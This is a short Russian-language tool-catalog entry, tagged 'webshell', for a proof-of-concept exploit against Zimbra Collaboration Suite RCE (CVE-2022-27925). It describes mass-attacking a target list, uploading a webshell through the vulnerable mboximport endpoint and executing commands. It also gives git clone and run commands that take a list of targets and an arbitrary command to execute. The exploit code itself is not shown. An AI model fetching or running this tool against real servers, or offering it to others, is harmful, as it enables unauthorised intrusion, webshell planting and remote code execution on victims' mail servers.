Каталог инструментов

1 инструментов

Тег: webshell ×
Exploitation

PoC-эксплойт для Zimbra Collaboration Suite RCE (CVE-2022-27925), часть hgrab-framework. Массово атакует список целей: находит форму входа Zimbra Web Client, эксплуатирует уязвимость загрузки веб-шелла через уязвимый mboximport-эндпоинт и выполняет …

git clone https://git.toolsofthetrade.qzz.io/recovered/cve-2022-27925.git cd cve-2022-27925 python3 main.py <list.txt> <output> "<command>" # list.txt: список целей вида http(s)://host:port